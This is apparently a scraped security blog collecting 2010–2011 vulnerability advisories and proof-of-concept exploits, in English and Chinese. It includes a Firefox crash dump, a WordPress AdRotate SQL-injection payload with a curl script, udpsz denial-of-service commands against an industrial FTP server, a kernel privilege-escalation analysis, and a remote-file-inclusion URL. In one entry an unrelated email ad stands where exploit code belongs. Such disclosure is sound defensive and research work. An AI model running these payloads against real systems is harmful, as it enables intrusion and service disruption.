HACKER3

Firefox 8.0 Null Pointer Dereference PoC

admin — Tue, 15 Nov 2011 15:13:16 +0000

# Firefox <= 8.0 null pointer dereference PoC exploit
# Author: 0in (Maksymilian Motyl)
# Tested on Firefox 8.0/4.0 on windows and Firefox 7.1 on Linux
# Lets see in code:
# $ cat ./mozilla-release/content/base/src/nsObjectLoadingContent.cpp

NS_IMETHODIMP nsObjectLoadingContent::OnStartRequest(nsIRequest *aRequest,
                                       nsISupports *aContext)
{
  if (aRequest != mChannel) { // our pointer is checked there, mChannel is null. I think maybe some magick in js can help there
    return NS_BINDING_ABORTED;
  }
  AutoNotifier notifier(this, PR_TRUE);

  if (!IsSuccessfulRequest(aRequest)) { // go

//----------------------------------------------------------------------------------
PRBool nsObjectLoadingContent::IsSuccessfulRequest(nsIRequest* aRequest)
{
  nsresult status;
  nsresult rv = aRequest->GetStatus(&status); // Code execution is here.

// ---------------------------------------------------------------------------------

DUMP:
  014E7A28   8B7D 08          MOV EDI,DWORD PTR SS:[EBP+8]
  014E7A2B   8B07             MOV EAX,DWORD PTR DS:[EDI] ; access violation when reading 0x00000000
  014E7A2D   8D4D FC          LEA ECX,DWORD PTR SS:[EBP-4]
  014E7A30   51               PUSH ECX
  014E7A31   57               PUSH EDI
  014E7A32   FF50 14          CALL DWORD PTR DS:[EAX+14]

  EAX 0012BFC0
  ECX 00080000
  EDX 00080000
  EBX 03A199E8
  ESP 0012BF44
  EBP 0012BF54
  ESI 03A199C0
  EDI 00000000
  EIP 014E7A2B xul.014E7A2B

$ cat 2011_powrot_komuny.html

WordPress AdRotate plugin

admin — Tue, 15 Nov 2011 14:50:51 +0000

# Exploit Title: WordPress AdRotate plugin # Date: 2011-11-8
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/adrotate.3.6.6.zip
# Version: 3.6.6 (tested)
# Note: parameter $_GET["track"] has to be Base64 encoded

---
PoC
---

http://www.site.com/wp-content/plugins/adrotate/adrotate-out.php?track=MScgQU5EIDE9SUYoMj4xLEJFTkNITUFSSyg1MDAwMDAwLE1ENShDSEFSKDExNSwxMTMsMTA4LDEwOSw5NywxMTIpKSksMCkj

e.g.
#!/bin/bash
payload="1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)#"
encoded=`echo -n "1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)#" | base64 -w 0`
curl http://www.site.com/wp-content/plugins/adrotate/adrotate-out.php?track=$encoded

---------------
Vulnerable code
---------------

if(isset($_GET['track']) OR $_GET['track'] != '') {
    $meta = base64_decode($_GET['track']);
    ...
    list($ad, $group, $block) = explode("-", $meta);
    ...
    $bannerurl = $wpdb->get_var($wpdb->prepare("SELECT `link` FROM `".$prefix."adrotate` WHERE `id` = '".$ad."' LIMIT 1;")); //wrong (mis)usage of wpdb->prepare()

Optima PLC APIFTP Server两个拒绝服务漏洞

admin — Tue, 15 Nov 2011 14:42:38 +0000

受影响系统：
VanDyke AbsoluteFTP 2.x
描述：
Optima是一套通过SCADA/HMI界面控制PLC的自动软件。APIFTP Server是共享文件夹中的远程文件的文件服务器。
Optima PLC中存在两个安全漏洞，可被恶意用户利用造成拒绝服务。
1）处理 APIFTP Server (APIFTPServer.exe) 中的某些报文时的错误可被利用重复触发空指针引用，通过发送到端口10260/TCP的特制报文导致栈溢出；
2）处理 APIFTP Server (APIFTPServer.exe) 中的某些报文时的错误可被利用通过发送到端口10260/TCP的特制报文造成无限循环。
<*来源：Luigi Auriemma （aluigi@pivx.com）
链接：http://aluigi.altervista.org/adv/optimalog_1-adv.txt
*>
测试方法：

Luigi Auriemma （aluigi@pivx.com）提供了如下测试方法：

http://aluigi.org/testz/udpsz.zip

A]
udpsz -C “e803 0400 ff” -T -D -3 -d SERVER 10260 0×107

wait some seconds, the tool will quit automatically

B]
udpsz -C “e803 0400 00″ -T -D SERVER 10260 -1

建议：
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
www.vandyke.com/products/absoluteftp/

QQ影音.wav文件解析拒绝服务漏洞

admin — Fri, 10 Sep 2010 06:07:25 +0000

受影响系统：
Tencent QQ影音 2.3.696.400p1
描述：
QQ影音是腾讯公司推出的一款支持任何格式影片和音乐文件的本地播放器。

用户受骗使用QQ影音打开了畸形的.wav文件就会导致播放器崩溃。
<*来源：hadji samir （s-dz@hotmail.fr）
*>
测试方法：
http://www.exploit-db.com/download/14937

建议：
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://player.qq.com/

IE6 / 7 Remote Dos vulnerability

admin — Wed, 28 Jul 2010 11:54:57 +0000

# Exploit Title: IE6 / 7 Remote Dos vulnerability

# Date: 27/07/2010

# Author: Richard leahy

# Version: 6 / 7

# Tested on: Windows Xp Sp3

#category Remote Dos, might lead to code execution.

# The vulnerability is caused due to specifying a large value integer or string to the frame.frameBorder

causing a dos and may lead to code execution.

#code

Hotmail: Powerful Free email with security by Microsoft.

https://signup.live.com/signup.aspx?id=60969

Media Player Classic .m3u文件解析堆溢出漏洞

admin — Tue, 27 Jul 2010 11:52:12 +0000

受影响系统：
guliverkli Media Player Classic 1.3.1333.0
描述：
Media Player Classic是一个免费的基于WMP的播放程序，支持几乎所有媒体格式。
用户受骗使用Media Player Classic打开了畸形的.m3u播放列表文件就可以触发堆溢出，导致执行任意代码。
<*来源：Praveen Darshanam （praveen.recker@sify.com） *>
测试方法：

http://www.exploit-db.com/download/14477

建议：

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://guliverkli.sourceforge.net/

东方微点主动防御软件Mp110013.sys驱动本地内核权限提升漏洞

admin — Tue, 27 Jul 2010 11:48:59 +0000

受影响系统：
东方微点主动防御软件 <= 1.2.10581.0278
描述：

微点主动防御软件是微点公司自主研发的具有完全自主知识产权的第三代反病毒产品。
微点主动防御软件所使用的mp110013.sys驱动中存在安全漏洞，利用该漏洞能够实现本地特权提升，进Ring0。
详细说明：
UNEXPECTED_KERNEL_MODE_TRAP (7f)
This means a trap occurred in kernel mode, and it’s a trap of a kind
that the kernel isn’t allowed to have/catch (bound trap) or that
is always instant death (double fault). The first number in the
bugcheck params is the number of the trap (8 = double fault, etc)
Consult an Intel x86 family manual to learn more about what these
traps are. Here is a *portion* of those codes:
If kv shows a taskGate
use .tss on the part before the colon, then kv.
Else if kv shows a trapframe
use .trap on that value
Else
.trap on the appropriate frame will show where the trap was taken
(on x86, this will be the ebp that goes with the procedure KiTrap)
Endif
kb will then show the corrected stack.
Arguments:
Arg1: 00000008, EXCEPTION_DOUBLE_FAULT
Arg2: 80042000
Arg3: 00000000
Arg4: 00000000
Debugging Details:
——————
BUGCHECK_STR: 0x7f_8
TSS: 00000028 — (.tss 0×28)
eax=81123880 ebx=81120f80 ecx=2c23f92a edx=8000012c esi=00000000 edi=8113f388
eip=f96a37c0 esp=f7b25000 ebp=f7b278f8 iopl=0 nv up ei ng nz ac po nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010292
mp110013+0x7c0:
f96a37c0 ff30 push dword ptr [eax] ds:0023:81123880=00000937
Resetting default scope
DEFAULT_BUCKET_ID: CODE_CORRUPTION
PROCESS_NAME: MPSVC2.exe
LAST_CONTROL_TRANSFER: from f96a8c06 to f96a37c0
STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
f7b278f8 f96a8c06 81120f80 80e5ea38 817cf210 mp110013+0x7c0
f7b27ac8 804ef003 81728030 8113f388 806d12d0 mp110013+0x5c06
f7b27ad8 80574e4e 8113f3f8 811ec470 8113f388 nt!IopfCallDriver+0×31
f7b27aec 80575cdd 81728030 8113f388 811ec470 nt!IopSynchronousServiceTail+0×60
f7b27b94 8056e63a 00000508 00000000 00000000 nt!IopXxxControlFile+0x5e7
f7b27bc8 f7363b12 00000508 00000000 00000000 nt!NtDeviceIoControlFile+0x2a
f7b27c44 f99b081f 00000508 00000000 00000000 BehaviorMon!HookNtDeviceIoControlFile+0×892
f7b27d34 8053da48 00000508 00000000 00000000 Hookport+0x481f
f7b27d34 7c92eb94 00000508 00000000 00000000 nt!KiFastCallEntry+0xf8
0358f70c 7c92d8ef 7c801671 00000508 00000000 ntdll!KiFastSystemCallRet
0358f710 7c801671 00000508 00000000 00000000 ntdll!ZwDeviceIoControlFile+0xc
0358f770 006281bd 00000508 8000012c 0358f7c4 kernel32!DeviceIoControl+0xdd
0358fed8 003c7b9d 0000022c 0358fefc 0358ff04 mp110034+0x81bd
00000000 00000000 00000000 00000000 00000000 mp110036+0x7b9d

从过分析中的栈回溯，可以看到最终出问题的代码落在mp110013+0x5c06和mp110013+0x7c0所处的函数中。导致崩溃的指令如下：
f96a37c0 ff30 push dword ptr [eax] ds:0023:81123880=00000937

这条指令的寻址都是正常的，eax指向的DWORD是存在，那为什么无法push呢？！除非此时发生了“栈上溢”。这时我们来看看发生崩溃时的esp值，从上面的分析可以看到当时esp值为f7b25000，我们再查这个地址的属性。

kd> !address f7b25000
f7b24000 – 00004000
Usage KernelSpaceUsageKernelStack
KernelStack 80e5e828 : 3d4.82c

可以看出，该地址处于内核栈的顶部，由于系统在栈顶预留了0×1000的空间，因此已经无法再push了。
kd> dd f7b25000-4
f7b24ffc ???????? 00000000 00000000 8113bf1c
f7b2500c 81123ab0 43504354 020a0027 00000000
f7b2501c 00000000 00000000 00000000 00000000

看到了内核崩溃的直接原因后，下面我们需要找到其根本原因。首先我们定位到mp110013+0x5c06所在的函数，如下所示：

.text:00015BE4 loc_15BE4: ; CODE XREF: .text:00015BD7j
.text:00015BE4 push dword ptr [ebp-74h]
.text:00015BE7 push dword ptr [ebp-98h]
.text:00015BED lea eax, [ebp-0E8h]
.text:00015BF3 push eax
.text:00015BF4 push ebx
.text:00015BF5 call sub_1090E
.text:00015BFA mov [ebp-94h], eax
.text:00015C00 push ebx // 输入缓冲区指针
.text:00015C01 call sub_107B0 // 函数调用
.text:00015C06 mov [edi+1Ch], eax
.text:00015C09 cmp [ebp-94h], esi
.text:00015C0F jz short loc_15C1E
.text:00015C11 lea eax, [ebp-0E8h]
.text:00015C17 push eax
.text:00015C18 push ebx
.text:00015C19 call sub_107FE

可以看到，该函数会调用到sub_107B0函数，那么我们再来看看sub_107B0函数的逻辑：

.text:000107B0 sub_107B0 proc near ; CODE XREF: .text:00015C01p
.text:000107B0
.text:000107B0 arg_0 = dword ptr 8 // 输入缓冲区指针
.text:000107B0
.text:000107B0 mov edi, edi
.text:000107B2 push ebp
.text:000107B3 mov ebp, esp
.text:000107B5 mov eax, [ebp+arg_0]
.text:000107B8 add eax, 4
.text:000107BB mov ecx, [eax] // 循环次数可控
// 是输入缓冲区第二个DWORD
.text:000107BD add eax, 4
.text:000107C0 loc_107C0: ; CODE XREF: sub_107B0+15j
.text:000107C0 push dword ptr [eax] // 栈上溢
.text:000107C2 add eax, 4
.text:000107C5 loop loc_107C0
.text:000107C7 mov eax, [ebp+arg_0]
.text:000107CA call dword ptr [eax] // 调用输入缓冲区
// 第一个DWORD指向的函数
.text:000107CC pop ebp
.text:000107CD retn 4

从上面的代码可以看出，sub_107B0函数整个逻辑都是可以控制的，首先该函数中从输入缓冲区的第二个DWORD中取出要循环的次数，然后做了一个循环，最终调用了输入缓冲区的第一个DWORD所指向的函数。如果循环的次数太多，会导致栈上溢，但是这个次数我们可以通过输入缓冲区的第二个DWORD来控制，因此我们可以避免栈上溢。我们最为感兴趣的应该是循环后面的一个call指令，调用的是输入缓冲区的第一个DWORD所指向的函数。

通过几次调试可以发现，只要往输入缓冲区的第一个DWORD处放一个错误的值，在派遣例程中会把他修改成0，这样一来，最终调用的就是0这个地址。这是相当危险的，我们只要在0地址处申请内存，并存放Ring0 Shellcode就可以完美的利用这个漏洞。这一点我们可以通过栈回溯来证明，先看看调用sub_107B0函数的参数：

f7b278f8 f96a8c06 81120f80 80e5ea38 817cf210 mp110013+0x7c0

参数是81120f80，我们再来看看这个地址指向的数据，是不是我们输入缓冲区的数据：

kd> dd 81120f80
81120f80 00000000 2c240368 5e9e3918 8e3b184c
81120f90 22d5df8e 961331c8 d5a92216 0aa0f10a
81120fa0 b7e0c5f7 e75bcb05 97beb301 6c48e205
81120fb0 43c9daa0 08b79115 6cead1f5 3fe586fd
81120fc0 00000000 00000000 00000000 00000000
81120fd0 00000000 00000000 00000000 00000000
81120fe0 00000000 00000000 00000000 00000000
81120ff0 00000000 00000000 00000000 00000000

确实和我们之前篡改的输入数据基本一致，不过第一个DWORD被微点的派遣例程修改成了0。总的来说，这是一个本地权限提升内核漏洞。

<*来源：shineast （http://hi.baidu.com/shineastdh）

链接：http://www.wooyun.org/bug.php?action=view&id=45
*>

测试方法：

http://www.wooyun.org/bug.php?action=view&id=45

建议：

厂商补丁：

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.micropoint.com.cn/

Microsoft Windows快捷方式LNK文件自动执行代码漏洞

admin — Thu, 22 Jul 2010 11:16:04 +0000

受影响的软件及系统：
Windows XP
Windows Server 2003
Windows Vista
Windows Server 2008
Windows 7
综述：
Windows系统在处理LNK文件中所包含内容的机制上存在漏洞，攻击者可以通过在LNK文件中植入恶意内容使用户在浏览目录时执行指定的恶意代码，用户只要浏览了包含恶意LNK文件的U盘、网络共享、本地磁盘都会导致恶意代码的执行，因此攻击者可以很方便地利用此漏洞传播恶意代码。

此漏洞是一个0day漏洞，目前已经发现利用此漏洞通过U盘传播恶意代码的活动，微软已经得知了此漏洞的存在并开始研究处理，但还未提供针对此漏洞安全补丁，强烈建议参照临时解决方案进行处理以免受此漏洞的影响。

分析：
Windows支持使用快捷方式或LNK文件。LNK文件是指向本地文件的引用，点击LNK文件与点击快捷方式所指定的目标具有相同的效果。

Windows没有正确地处理LNK文件，特制的LNK文件可能导致Windows自动执行快捷方式文件所指定的代码。这些代码可能位于USB驱动、本地或远程文件系统、光驱或其他位置，使用资源管理器查看了LNK文件所在位置就足以触发这个漏洞。默认下Windows启动了自动加载和自动播放功能，因此在连接可移动设备（如USB闪存）后Windows会自动打开资源管理器。其他显示文件图标的应用也可用作这个漏洞的攻击载体。

此漏洞影响广泛而且导致威胁等级高，再次使攻击者通过U盘之类的移动介质和网络共享传播恶意代码成为可能，需要引起重视并及时采取应对措施。

解决方法：
在安装漏洞相应的补丁之前，Windows用户可以采用以下的临时解决方案来免受漏洞的影响：

* 禁止显示快捷方式图标的功能。注意这将使得所有快捷方式显示空白图标。

执行如下步骤：

1. 点击 “开始” -> “运行”，在文本框中输入“regedit”，点击 “确定” 启动注册表编辑器。

2. 在注册表编辑器中定位并选中如下的注册表项：

HKEY_CLASSES_ROOT\lnkfile\shellex\IconHandler

3. 在 “文件” 菜单中选择 “导出”。

4. 在导出注册表文件对话框的文件名处输入 “LNK_Icon_Backup.reg” ，点击 “确定”。

此步骤保存相关的注册表配置到备份文件中，待安装了正式的补丁后可以双击 LNK_Icon_Backup.reg 备份文件重新导入到注册表恢复系统配置。

5. 在注册表右边窗口右键点击 “默认” 表项，选择 “修改”，清空 “数值数据” 框中的数据，点击 “确定”。

6. 重启系统。

厂商状态：
微软已经得到了漏洞相关的信息正在处理，但还没有发布安全补丁，我们建议在安装官方补丁之前应用本通告的临时解决方案以降低漏洞的威胁：
http://www.microsoft.com/technet/security/advisory/2286198.mspx

QQ影音ASX和CUE文件处理栈溢出漏洞

admin — Thu, 22 Jul 2010 11:07:09 +0000

受影响系统：
Tencent QQ影音 2.3.969.400p1
不受影响系统：
Tencent QQ影音 2.4.716.400p1
描述：
QQ影音是腾讯公司推出的一款支持任何格式影片和音乐文件的本地播放器。

用户受骗使用QQ影音打开了特制的ASX或CUE文件就可以触发栈溢出，导致执行任意代码。

<*来源：Li Qingshan Lufeng Li （lilf@neusoft.com）链接：http://secunia.com/advisories/40668/ *>

测试方法：
http://www.exploit-db.com/download/14428
http://www.exploit-db.com/download/14431

建议：
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://player.qq.com/

PHP Chat for 123 Flash Chat Remote File Inclusion Vulnerability

admin — Wed, 21 Jul 2010 11:34:38 +0000

*# Exploit Title: php_chat Remote File inclusion Vulnerability
# Date: 2010/07/20
# Author: HaCkEr arar
# Email: y.0@hotmail.de
# My Sites : www.vbspiders.com
# Script home:

http://www.opensourcescripts.com/dir/PHP/Chat/php_chat_module_for123_flash_chat_4902.html

# Tested on: Windows
# Team hacker:HaCkEr aRaR & ViRuS Qalaa >>>X-MaN HaCk3r TeaM
# ViRuS Qalaa: em9@live.com

:::::::::::::::::::::::::

=================Exploit=================

-=[ vuln c0de ]=-

include(‘db/’.$select_db.’.php’);

login_chat.php

Line:41

—-exploit—-

http://{localhost}/{path}login_chat.php?select_db=shell.txt?

———greatz———-

Greatz to :

ViRuS Qalaa,VoLc4n0,Members www.j1q1.com

and My friends Others and My friends in MSN

EnJoY o_O*